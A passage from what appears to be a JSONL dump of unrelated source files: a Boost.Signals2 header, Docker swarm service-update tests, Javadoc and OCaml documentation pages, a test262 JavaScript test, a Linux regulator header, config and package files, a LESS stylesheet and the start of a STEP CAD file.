BOOST_PP_INC(n)) BOOST_PP_CAT(BOOST_PP_CAT(arg, BOOST_PP_INC(n)), _type);\n BOOST_PP_REPEAT(BOOST_SIGNALS2_NUM_ARGS, BOOST_SIGNALS2_MISC_STATEMENT, ~)\n#undef BOOST_SIGNALS2_MISC_STATEMENT\n#if BOOST_SIGNALS2_NUM_ARGS == 1\n typedef arg1_type argument_type;\n#elif BOOST_SIGNALS2_NUM_ARGS == 2\n typedef arg1_type first_argument_type;\n typedef arg2_type second_argument_type;\n#endif\n\n template class arg : public\n detail::BOOST_SIGNALS2_PREPROCESSED_ARG_N_TYPE_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n \n {};\n\n BOOST_STATIC_CONSTANT(int, arity = BOOST_SIGNALS2_NUM_ARGS);\n\n#else // BOOST_NO_VARIADIC_TEMPLATES\n\n template class arg\n {\n public:\n typedef typename detail::variadic_arg_type::type type;\n };\n BOOST_STATIC_CONSTANT(int, arity = sizeof...(Args));\n\n#endif // BOOST_NO_VARIADIC_TEMPLATES\n\n BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)(const combiner_type &combiner = combiner_type(),\n const group_compare_type &group_compare = group_compare_type()):\n _pimpl(new impl_class(combiner, group_compare))\n {};\n virtual ~BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)()\n {\n disconnect_all_slots();\n }\n connection connect(const slot_type &slot, connect_position position = at_back)\n {\n return (*_pimpl).connect(slot, position);\n }\n connection connect(const group_type &group,\n const slot_type &slot, connect_position position = at_back)\n {\n return (*_pimpl).connect(group, slot, position);\n }\n connection connect_extended(const extended_slot_type &slot, connect_position position = at_back)\n {\n return (*_pimpl).connect_extended(slot, position);\n }\n connection connect_extended(const group_type &group,\n const extended_slot_type &slot, connect_position position = at_back)\n {\n return (*_pimpl).connect_extended(group, slot, position);\n }\n void disconnect_all_slots()\n {\n (*_pimpl).disconnect_all_slots();\n }\n void disconnect(const group_type &group)\n {\n (*_pimpl).disconnect(group);\n }\n template \n void disconnect(const T &slot)\n {\n (*_pimpl).disconnect(slot);\n }\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS))\n {\n return (*_pimpl)(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n return (*_pimpl)(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n std::size_t num_slots() const\n {\n return (*_pimpl).num_slots();\n }\n bool empty() const\n {\n return (*_pimpl).empty();\n }\n combiner_type combiner() const\n {\n return (*_pimpl).combiner();\n }\n void set_combiner(const combiner_type &combiner)\n {\n return (*_pimpl).set_combiner(combiner);\n }\n protected:\n virtual shared_ptr lock_pimpl() const\n {\n return _pimpl;\n }\n private:\n shared_ptr\n _pimpl;\n };\n\n namespace detail\n {\n // wrapper class for storing other signals as slots with automatic lifetime tracking\n template\n class BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS);\n\n template\n class BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNAL_TEMPLATE_SPECIALIZATION\n {\n public:\n typedef typename BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n ::result_type\n result_type;\n\n BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n (const BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n \n &signal):\n _weak_pimpl(signal._pimpl)\n {}\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS))\n {\n shared_ptr >\n shared_pimpl(_weak_pimpl.lock());\n if(shared_pimpl == 0) boost::throw_exception(expired_slot());\n return (*shared_pimpl)(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n shared_ptr >\n shared_pimpl(_weak_pimpl.lock());\n if(shared_pimpl == 0) boost::throw_exception(expired_slot());\n return (*shared_pimpl)(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n private:\n boost::weak_ptr > _weak_pimpl;\n };\n\n#ifndef BOOST_NO_VARIADIC_TEMPLATES\n template\n class extended_signature: public variadic_extended_signature\n {};\n#else // BOOST_NO_VARIADIC_TEMPLATES\n template\n class extended_signature;\n // partial template specialization\n template\n class extended_signature\n {\n public:\n// typename function_traits::result_type (\n// const boost::signals2::connection &,\n// typename function_traits::arg1_type,\n// typename function_traits::arg2_type,\n// ...,\n// typename function_traits::argn_type)\n#define BOOST_SIGNALS2_EXT_SIGNATURE(arity, Signature) \\\n typename function_traits::result_type ( \\\n const boost::signals2::connection & BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS) \\\n BOOST_PP_ENUM(arity, BOOST_SIGNALS2_SIGNATURE_TO_ARGN_TYPE, Signature) )\n typedef function function_type;\n#undef BOOST_SIGNALS2_EXT_SIGNATURE\n };\n\n template\n class signalN;\n // partial template specialization\n template\n class signalN\n {\n public:\n typedef BOOST_SIGNALS2_SIGNAL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)<\n BOOST_SIGNALS2_PORTABLE_SIGNATURE(BOOST_SIGNALS2_NUM_ARGS, Signature),\n Combiner, Group,\n GroupCompare, SlotFunction, ExtendedSlotFunction, Mutex> type;\n };\n\n#endif // BOOST_NO_VARIADIC_TEMPLATES\n\n } // namespace detail\n } // namespace signals2\n} // namespace boost\n\n#undef BOOST_SIGNALS2_NUM_ARGS\n#undef BOOST_SIGNALS2_SIGNAL_TEMPLATE_INSTANTIATION\n"} {"text": "// +build !windows\n\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\n\t\"github.com/docker/docker/api/types/swarm\"\n\t\"github.com/docker/docker/integration-cli/checker\"\n\t\"github.com/go-check/check\"\n)\n\nfunc (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) {\n\td := s.AddDaemon(c, true, true)\n\tout, err := d.Cmd(\"service\", \"create\", \"--detach\", \"--no-resolve-image\", \"--name=test\", \"busybox\", \"top\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice := d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 0)\n\n\t// add label to empty set\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--label-add\", \"foo=bar\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice = d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 1)\n\tc.Assert(service.Spec.Labels[\"foo\"], checker.Equals, \"bar\")\n\n\t// add label to non-empty set\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--label-add\", \"foo2=bar\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice = d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 2)\n\tc.Assert(service.Spec.Labels[\"foo2\"], checker.Equals, \"bar\")\n\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--label-rm\", \"foo2\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice = d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 1)\n\tc.Assert(service.Spec.Labels[\"foo2\"], checker.Equals, \"\")\n\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--label-rm\", \"foo\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice = d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 0)\n\tc.Assert(service.Spec.Labels[\"foo\"], checker.Equals, \"\")\n\n\t// now make sure we can add again\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--label-add\", \"foo=bar\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\tservice = d.GetService(c, \"test\")\n\tc.Assert(service.Spec.Labels, checker.HasLen, 1)\n\tc.Assert(service.Spec.Labels[\"foo\"], checker.Equals, \"bar\")\n}\n\nfunc (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) {\n\td := s.AddDaemon(c, true, true)\n\ttestName := \"test_secret\"\n\tid := d.CreateSecret(c, swarm.SecretSpec{\n\t\tAnnotations: swarm.Annotations{\n\t\t\tName: testName,\n\t\t},\n\t\tData: []byte(\"TESTINGDATA\"),\n\t})\n\tc.Assert(id, checker.Not(checker.Equals), \"\", check.Commentf(\"secrets: %s\", id))\n\ttestTarget := \"testing\"\n\tserviceName := \"test\"\n\n\tout, err := d.Cmd(\"service\", \"create\", \"--detach\", \"--no-resolve-image\", \"--name\", serviceName, \"busybox\", \"top\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\t// add secret\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--secret-add\", fmt.Sprintf(\"source=%s,target=%s\", testName, testTarget))\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\tout, err = d.Cmd(\"service\", \"inspect\", \"--format\", \"{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}\", serviceName)\n\tc.Assert(err, checker.IsNil)\n\n\tvar refs []swarm.SecretReference\n\tc.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)\n\tc.Assert(refs, checker.HasLen, 1)\n\n\tc.Assert(refs[0].SecretName, checker.Equals, testName)\n\tc.Assert(refs[0].File, checker.Not(checker.IsNil))\n\tc.Assert(refs[0].File.Name, checker.Equals, testTarget)\n\n\t// remove\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--secret-rm\", testName)\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\tout, err = d.Cmd(\"service\", \"inspect\", \"--format\", \"{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}\", serviceName)\n\tc.Assert(err, checker.IsNil)\n\n\tc.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)\n\tc.Assert(refs, checker.HasLen, 0)\n}\n\nfunc (s *DockerSwarmSuite) TestServiceUpdateConfigs(c *check.C) {\n\td := s.AddDaemon(c, true, true)\n\ttestName := \"test_config\"\n\tid := d.CreateConfig(c, swarm.ConfigSpec{\n\t\tAnnotations: swarm.Annotations{\n\t\t\tName: testName,\n\t\t},\n\t\tData: []byte(\"TESTINGDATA\"),\n\t})\n\tc.Assert(id, checker.Not(checker.Equals), \"\", check.Commentf(\"configs: %s\", id))\n\ttestTarget := \"/testing\"\n\tserviceName := \"test\"\n\n\tout, err := d.Cmd(\"service\", \"create\", \"--detach\", \"--no-resolve-image\", \"--name\", serviceName, \"busybox\", \"top\")\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\t// add config\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--config-add\", fmt.Sprintf(\"source=%s,target=%s\", testName, testTarget))\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\tout, err = d.Cmd(\"service\", \"inspect\", \"--format\", \"{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}\", serviceName)\n\tc.Assert(err, checker.IsNil)\n\n\tvar refs []swarm.ConfigReference\n\tc.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)\n\tc.Assert(refs, checker.HasLen, 1)\n\n\tc.Assert(refs[0].ConfigName, checker.Equals, testName)\n\tc.Assert(refs[0].File, checker.Not(checker.IsNil))\n\tc.Assert(refs[0].File.Name, checker.Equals, testTarget)\n\n\t// remove\n\tout, err = d.Cmd(\"service\", \"update\", \"--detach\", \"test\", \"--config-rm\", testName)\n\tc.Assert(err, checker.IsNil, check.Commentf(\"%s\", out))\n\n\tout, err = d.Cmd(\"service\", \"inspect\", \"--format\", \"{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}\", serviceName)\n\tc.Assert(err, checker.IsNil)\n\n\tc.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)\n\tc.Assert(refs, checker.HasLen, 0)\n}\n"} {"text": "\n\n\n\n\nHTMLLabelElement (Java SE 12 & JDK 12 )\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\n
\n\n
\n
\n
Module jdk.xml.dom
\n\n

Interface HTMLLabelElement

\n
\n
\n
\n\n
\n
\n\n
\n
\n
    \n
  • \n\n
    \n
      \n
    • \n\n\n

      Method Detail

      \n\n\n\n
        \n
      • \n

        getForm

        \n
        HTMLFormElement getForm()
        \n
        Returns the FORM element containing this control. Returns\n null if this control is not within the context of a form.
        \n
      • \n
      \n\n\n\n
        \n
      • \n

        getAccessKey

        \n
        String getAccessKey()
        \n
        A single character access key to give access to the form control. See\n the accesskey attribute definition in HTML 4.0.
        \n
      • \n
      \n\n\n\n
        \n
      • \n

        setAccessKey

        \n
        void setAccessKey​(String accessKey)
        \n
      • \n
      \n\n\n\n
        \n
      • \n

        getHtmlFor

        \n
        String getHtmlFor()
        \n
        This attribute links this label with another form control by\n id attribute. See the for attribute definition in HTML\n 4.0.
        \n
      • \n
      \n\n\n\n
        \n
      • \n

        setHtmlFor

        \n
        void setHtmlFor​(String htmlFor)
        \n
      • \n
      \n
    • \n
    \n
    \n
  • \n
\n
\n
\n
\n\n\n\n\n"} {"text": "// This file was procedurally generated from the following sources:\n// - src/class-elements/rs-private-getter-alt.case\n// - src/class-elements/productions/cls-decl-wrapped-in-sc.template\n/*---\ndescription: Valid PrivateName as private getter (fields definition wrapped in semicolons)\nesid: prod-FieldDefinition\nfeatures: [class-methods-private, class-fields-private, class, class-fields-public]\nflags: [generated]\ninfo: |\n ClassElement :\n MethodDefinition\n ...\n ;\n\n MethodDefinition :\n ...\n get ClassElementName ( ){ FunctionBody }\n ...\n\n ClassElementName :\n PropertyName\n PrivateName\n\n PrivateName ::\n # IdentifierName\n\n IdentifierName ::\n IdentifierStart\n IdentifierName IdentifierPart\n\n IdentifierStart ::\n UnicodeIDStart\n $\n _\n \\ UnicodeEscapeSequence\n\n IdentifierPart::\n UnicodeIDContinue\n $\n \\ UnicodeEscapeSequence\n \n\n UnicodeIDStart::\n any Unicode code point with the Unicode property \"ID_Start\"\n\n UnicodeIDContinue::\n any Unicode code point with the Unicode property \"ID_Continue\"\n\n NOTE 3\n The sets of code points with Unicode properties \"ID_Start\" and\n \"ID_Continue\" include, respectively, the code points with Unicode\n properties \"Other_ID_Start\" and \"Other_ID_Continue\".\n\n---*/\n\n\nclass C {\n ;;;;\n ;;;;;;#$_; #__; #\\u{6F}_; #℘_; #ZW_‌_NJ_; #ZW_‍_J_;\n get #$() {\n return this.#$_;\n }\n get #_() {\n return this.#__;\n }\n get #\\u{6F}() {\n return this.#\\u{6F}_;\n }\n get #℘() {\n return this.#℘_;\n }\n get #ZW_‌_NJ() {\n return this.#ZW_‌_NJ_;\n }\n get #ZW_‍_J() {\n return this.#ZW_‍_J_;\n }\n;;;;;;;\n ;;;;\n $(value) {\n this.#$_ = value;\n return this.#$;\n }\n _(value) {\n this.#__ = value;\n return this.#_;\n }\n \\u{6F}(value) {\n this.#\\u{6F}_ = value;\n return this.#\\u{6F};\n }\n ℘(value) {\n this.#℘_ = value;\n return this.#℘;\n }\n ZW_‌_NJ(value) {\n this.#ZW_‌_NJ_ = value;\n return this.#ZW_‌_NJ;\n }\n ZW_‍_J(value) {\n this.#ZW_‍_J_ = value;\n return this.#ZW_‍_J;\n }\n\n}\n\nvar c = new C();\n\nassert.sameValue(c.$(1), 1);\nassert.sameValue(c._(1), 1);\nassert.sameValue(c.\\u{6F}(1), 1);\nassert.sameValue(c.℘(1), 1);\nassert.sameValue(c.ZW_‌_NJ(1), 1);\nassert.sameValue(c.ZW_‍_J(1), 1);\n"} {"text": "/* SPDX-License-Identifier: GPL-2.0-only */\n/*\n * Copyright (C) ST-Ericsson SA 2010\n *\n * Author: Bengt Jonsson for ST-Ericsson,\n *\t Jonas Aaberg for ST-Ericsson\n */\n\n#ifndef DBX500_REGULATOR_H\n#define DBX500_REGULATOR_H\n\n#include \n\n/**\n * struct dbx500_regulator_info - dbx500 regulator information\n * @desc: regulator description\n * @is_enabled: status of the regulator\n * @epod_id: id for EPOD (power domain)\n * @is_ramret: RAM retention switch for EPOD (power domain)\n *\n */\nstruct dbx500_regulator_info {\n\tstruct regulator_desc desc;\n\tbool is_enabled;\n\tu16 epod_id;\n\tbool is_ramret;\n\tbool exclude_from_power_state;\n};\n\nvoid power_state_active_enable(void);\nint power_state_active_disable(void);\n\n\n#ifdef CONFIG_REGULATOR_DEBUG\nint ux500_regulator_debug_init(struct platform_device *pdev,\n\t\t\t struct dbx500_regulator_info *regulator_info,\n\t\t\t int num_regulators);\n\nint ux500_regulator_debug_exit(void);\n#else\n\nstatic inline int ux500_regulator_debug_init(struct platform_device *pdev,\n\t\t\t struct dbx500_regulator_info *regulator_info,\n\t\t\t int num_regulators)\n{\n\treturn 0;\n}\n\nstatic inline int ux500_regulator_debug_exit(void)\n{\n\treturn 0;\n}\n\n#endif\n#endif\n"} {"text": "# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License\n\nexclude:\n - \"*.md\"\n - \"build_docs.sh\"\n - \"check_links.sh\"\n - \"content\"\n - \"content_en\"\n - \"content_zh\"\n\ninclude:\n - \"*.zh.md\"\n"} {"text": "\n\n \n \n\n\n"} {"text": "
\n
Previous\n Up\n Next\n
\n

Module type Hashtbl.SeededHashedType

\n\n
module type SeededHashedType = sig .. end
\nThe input signature of the functor Hashtbl.MakeSeeded.
\nSince 4.00.0
\n
\n
\n\n
type t;\n
\n
\nThe type of the hashtable keys.
\n
\n\n\n
let equal: (t, t) => bool;\n
\nThe equality predicate used to compare keys.
\n
\n\n
let hash: (int, t) => int;\n
\nA seeded hashing function on keys. The first argument is\n the seed. It must be the case that if equal x y is true,\n then hash seed x = hash seed y for any value of seed.\n A suitable choice for hash is the function Hashtbl.seeded_hash\n below.
\n
\n
"} {"text": "{\n \"name\": \"jokester\",\n \"description\": \"A Vue.js project\",\n \"version\": \"1.0.0\",\n \"author\": \"davidkatz <15Dkatz@shcp.edu>\",\n \"private\": true,\n \"scripts\": {\n \"dev\": \"cross-env NODE_ENV=development webpack-dev-server --open --hot\",\n \"build\": \"cross-env NODE_ENV=production webpack --progress --hide-modules\"\n },\n \"dependencies\": {\n \"vue\": \"^2.2.1\",\n \"vuex\": \"^2.2.1\"\n },\n \"devDependencies\": {\n \"babel-core\": \"^6.0.0\",\n \"babel-loader\": \"^6.0.0\",\n \"babel-preset-latest\": \"^6.0.0\",\n \"cross-env\": \"^3.0.0\",\n \"css-loader\": \"^0.25.0\",\n \"file-loader\": \"^0.9.0\",\n \"vue-loader\": \"^11.1.4\",\n \"vue-template-compiler\": \"^2.2.1\",\n \"webpack\": \"^2.2.0\",\n \"webpack-dev-server\": \"^2.2.0\"\n }\n}\n"} {"text": "export interface About {\n instance: {\n name: string\n shortDescription: string\n description: string\n terms: string\n\n codeOfConduct: string\n hardwareInformation: string\n\n creationReason: string\n moderationInformation: string\n administrator: string\n maintenanceLifetime: string\n businessModel: string\n\n languages: string[]\n categories: number[]\n }\n}\n"} {"text": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"zuovidoBtn.png\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"3x\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}"} {"text": ".container,\n#main {\n position: relative;\n}\n\n#menu-off {\n position: absolute;\n top: 0;\n left: 100%;\n .transition(.4s);\n}\n\n#menu {\n position: fixed;\n top: 0;\n left: 0;\n bottom: 0;\n z-index: 66;\n width: @menuWidth;\n min-height: 100%;\n background: #fff;\n box-shadow: @boxShadow;\n .transition(.4s, cubic-bezier(.18, .81, .3, .89));\n will-change: transform, -webkit-transform;\n\n &.hide {\n .transform(translateX(-100%));\n #menu-off {\n .transform(scale(0));\n }\n +#main {\n padding-left: 0;\n }\n }\n\n .inner {\n position: relative;\n height: 100%;\n }\n\n .brand-wrap {\n background-size: 100% 100%;\n }\n\n .brand {\n padding: 40px @menuPadding 2em;\n background: fade(@primaryColor, 50%);\n }\n\n .avatar {\n display: block;\n width: 80px;\n height: 80px;\n border: 2px solid #fff;\n border-radius: 50%;\n overflow: hidden;\n box-shadow: @boxShadow;\n }\n\n .introduce {\n margin: 1em 0 0;\n color: @textPrimaryColor;\n }\n\n .mail {\n display: inline-block;\n padding-top: 4px;\n color: @lightPrimaryColor;\n font-size: 13px;\n }\n\n .scroll-wrap {\n position: relative;\n overflow-y: auto;\n }\n\n\n .nav {\n margin: 0;\n padding: 12px 0;\n height: 300px;\n min-height: ~\"calc(100% - 115px)\";\n list-style: none;\n line-height: @navH;\n\n li {\n padding: 0 @menuPadding;\n\n .icon {\n position: absolute;\n top: 0;\n left: @menuPadding;\n line-height: inherit;\n }\n\n &:hover,\n &.active {\n background: rgba(0, 0, 0, .05);\n\n a,\n .icon {\n color: @primaryColor;\n }\n }\n }\n\n a {\n display: block;\n padding-left: @menuPadding*2.4;\n height: @navH;\n line-height: @navH;\n font-weight: 500;\n color: @secondaryTextColor;\n text-decoration: none;\n }\n }\n}\n\n#main {\n padding-left: @menuWidth;\n min-height: 100%;\n .transition(.4s);\n}\n\n.body-wrap {\n padding: 30px 0 40px;\n min-height: ~'calc(100vh - 340px)';\n}\n\n.container {\n width: @contentWidth;\n margin: 0 auto;\n\n &:after {\n content: \"\";\n display: table;\n clear: both;\n }\n}\n\n.mask {\n visibility: hidden;\n position: fixed;\n top: 0;\n left: 0;\n bottom: 0;\n z-index: 88;\n width: 100%;\n height: 100%;\n background: #000;\n opacity: 0;\n pointer-events: none;\n .transition(.3s);\n\n &.in {\n visibility: visible;\n pointer-events: auto;\n opacity: .3;\n }\n}\n\n.footer {\n color: rgba(255,255,255,.6);\n background: @darkPrimaryColor;\n p {\n margin: 0;\n line-height: 1.6;\n font-size: 13px;\n text-align: center;\n span {\n &:not(:first-child):before {\n content: \"·\";\n padding: 0 .5em;\n }\n }\n a {\n border-bottom: 1px dotted rgba(255,255,255,.5);\n &:hover {\n border-bottom: 1px solid rgba(255,255,255,.7);\n }\n }\n }\n\n .top {\n padding: 16px;\n background: @primaryColor;\n }\n a {\n color: inherit;\n opacity: .8;\n\n &:hover {\n color: #fff;\n text-decoration: none\n }\n }\n .bottom {\n padding: 16px;\n }\n}\n\na[title=\"站长统计\"] {\n display: none;\n}\n\n@media screen and (max-width:1240px) {\n #menu-off {\n display: none;\n }\n\n #menu {\n z-index: 99;\n box-shadow: none;\n .transform(translateX(-100%));\n\n &.show {\n .transform(translateX(0));\n }\n }\n\n #main {\n padding-left: 0;\n }\n}\n\n\n@media screen and (max-width:1040px) {\n .container {\n width: 100%;\n padding: 20px 16px;\n }\n}\n\n@media screen and (max-width:760px) {\n #main {\n width: 100%;\n overflow-x: hidden;\n }\n\n #menu {\n .brand {\n padding-top: 20px;\n padding-bottom: 1em;\n }\n\n .nav {\n line-height: @mNavH;\n\n a {\n height: @mNavH;\n line-height: @mNavH;\n }\n }\n }\n\n ::-webkit-scrollbar {\n display: none;\n }\n}\n\n"} {"text": "ISO-10303-21;\r\nHEADER;\r\n/* Generated by software containing ST-Developer\r\n * from STEP Tools, Inc. (www.steptools.com) \r\n */\r\n\r\nFILE_DESCRIPTION(\r\n/* description */ (''),\r\n/* implementation_level */ '2;1');\r\n\r\nFILE_NAME(\r\n/* name */ \r\n'D:\\\\OpenROV\\\\2.8\\\\Github Official\\\\STEP\\\\Electronics Tube\\\\Electronic\r\ns Endcaps\\\\Non Pass Through\\\\NPT Flange Inner.stp',\r\n/* time_stamp */ '2015-09-22T15:49:13-07:00',\r\n/* author */ ('Evil Brian'),\r\n/* organization */ (''),\r\n/* preprocessor_version */ 'ST-DEVELOPER v16.1',\r\n/* originating_system */ 'Autodesk Inventor 2016',\r\n/* authorisation */ '');\r\n\r\nFILE_SCHEMA (('AUTOMOTIVE_DESIGN { 1 0 10303 214 3 1 1 }'));\r\nENDSEC;\r\n\r\nDATA;\r\n#10=MECHANICAL_DESIGN_GEOMETRIC_PRESENTATION_REPRESENTATION('',(#17,#18),\r\n#857);\r\n#11=SHAPE_REPRESENTATION_RELATIONSHIP('SRR','None',#866,#12);\r\n#12=ADVANCED_BREP_SHAPE_REPRESENTATION('',(#13),#856);\r\n#13=MANIFOLD_SOLID_BREP('Solid1',#503);\r\n#14=FACE_BOUND('',#61,.T.);\r\n#15=FACE_BOUND('',#81,.T.);\r\n#16=FACE_BOUND('',#86,.T.);\r\n#17=STYLED_ITEM('',(#876),#479);\r\n#18=STYLED_ITEM('',(#875),#13);\r\n#19=PLANE('',#508);\r\n#20=PLANE('',#509);\r\n#21=PLANE('',#524);\r\n#22=PLANE('',#527);\r\n#23=PLANE('',#530);\r\n#24=PLANE('',#533);\r\n#25=PLANE('',#536);\r\n#26=PLANE('',#539);\r\n#27=PLANE('',#542);\r\n#28=PLANE('',#545);\r\n#29=PLANE('',#548);\r\n#30=PLANE('',#551);\r\n#31=PLANE('',#556);\r\n#32=FACE_OUTER_BOUND('',#58,.T.);\r\n#33=FACE_OUTER_BOUND('',#59,.T.);\r\n#34=FACE_OUTER_BOUND('',#60,.T.);\r\n#35=FACE_OUTER_BOUND('',#62,.T.);\r\n#36=FACE_OUTER_BOUND('',#63,.T.);\r\n#37=FACE_OUTER_BOUND('',#64,.T.);\r\n#38=FACE_OUTER_BOUND('',#65,.T.);\r\n#39=FACE_OUTER_BOUND('',#66,.T.);\r\n#40=FACE_OUTER_BOUND('',#67,.T.);\r\n#41=FACE_OUTER_BOUND('',#68,.T.);\r\n#42=FACE_OUTER_BOUND('',#69,.T.);\r\n#43=FACE_OUTER_BOUND('',#70,.T.);\r\n#44=FACE_OUTER_BOUND('',#71,.T.);\r\n#45=FACE_OUTER_BOUND('',#72,.T.);\r\n#46=FACE_OUTER_BOUND('',#73,.T.);\r\n#47=FACE_OUTER_BOUND('',#74,.T.);\r\n#48=FACE_OUTER_BOUND('',#75,.T.);\r\n#49=FACE_OUTER_BOUND('',#76,.T.);\r\n#50=FACE_OUTER_BOUND('',#77,.T.);\r\n#51=FACE_OUTER_BOUND('',#78,.T.);\r\n#52=FACE_OUTER_BOUND('',#79,.T.);\r\n#53=FACE_OUTER_BOUND('',#80,.T.);\r\n#54=FACE_OUTER_BOUND('',#82,.T.);\r\n#55=FACE_OUTER_BOUND('',#83,.T.);\r\n#56=FACE_OUTER_BOUND('',#84,.T.);\r\n#57=FACE_OUTER_BOUND('',#85,.T.);\r\n#58=EDGE_LOOP('',(#322,#323,#324,#325));\r\n#59=EDGE_LOOP('',(#326,#327,#328,#329));\r\n#60=EDGE_LOOP('',(#330,#331,#332,#333,#334,#335,#336,#337,#338,#339,#340,\r\n#341,#342,#343,#344,#345,#346,#347,#348,#349,#350,#351,#352));\r\n#61=EDGE_LOOP('',(#353));\r\n#62=EDGE_LOOP('',(#354,#355,#356,#357));\r\n#63=EDGE_LOOP('',(#358,#359,#360,#361));\r\n#64=EDGE_LOOP('',(#362,#363,#364,#365));\r\n#65=EDGE_LOOP('',(#366,#367,#368,#369));\r\n#66=EDGE_LOOP('',(#370,#371,#372,#373));\r\n#67=EDGE_LOOP('',(#374,#375,#376,#377));\r\n#68=EDGE_LOOP('',(#378,#379,#380,#381));\r\n#69=EDGE_LOOP('',(#382,#383,#384,#385));\r\n#70=EDGE_LOOP('',(#386,#387,#388,#389));\r\n#71=EDGE_LOOP('',(#390,#391,#392,#393));\r\n#72=EDGE_LOOP('',(#394,#395,#396,#397));\r\n#73=EDGE_LOOP('',(#398,#399,#400,#401));\r\n#74=EDGE_LOOP('',(#402,#403,#404,#405));\r\n#75=EDGE_LOOP('',(#406,#407,#408,#409));\r\n#76=EDGE_LOOP('',(#410,#411,#412,#413));\r\n#77=EDGE_LOOP('',(#414,#415,#416,#417));\r\n#78=EDGE_LOOP('',(#418,#419,#420,#421));\r\n#79=EDGE_LOOP('',(#422,#423,#424,#425));\r\n#80=EDGE_LOOP('',(#426));\r\n#81=EDGE_LOOP('',(#427));\r\n#82=EDGE_LOOP('',(#428,#429,#430,#431));\r\n#83=EDGE_LOOP('',(#432,#433,#434,#435));\r\n#84=EDGE_LOOP('',(#436,#437,#438,#439));\r\n#85=EDGE_LOOP('',(#440,#44